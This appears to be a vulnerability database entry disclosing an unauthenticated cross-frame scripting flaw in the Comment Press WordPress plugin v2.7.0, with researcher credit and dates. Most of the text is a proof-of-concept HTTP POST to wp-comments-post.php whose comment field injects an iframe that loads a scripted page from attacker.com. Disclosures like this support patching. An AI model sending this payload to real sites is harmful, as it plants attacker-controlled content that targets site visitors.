An Unauthenticated Cross-Frame Scripting vulnerability was discovered in the Comment Press plugin v2.7.0 for WordPress.
[!] :: PoC (Burp Suite): POST /wp-comments-post.php HTTP/1.1 Host: example.com Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 229 Origin: https://example.com.com Referer: https://example.com.com/?post_id=8%27&comments=13%27&get=60%27&order=DESC author=Ex.Mi&email=poc%40exmi.xss&comment=%3C!--%3E%3Ciframe%20src%3D%2F%2Fattacker.com%2Fpayload%2Fxfsii.html%20sandbox%3Dallow-scripts%3E%3C%2Fiframe%3E&name=username&nombre=&form-saic=&comment_post_ID=13&comment_parent=0
Ex.Mi
Ex.Mi
Yes
2020-10-15 (about 2 years ago)
2020-10-15 (about 2 years ago)
2020-10-17 (about 2 years ago)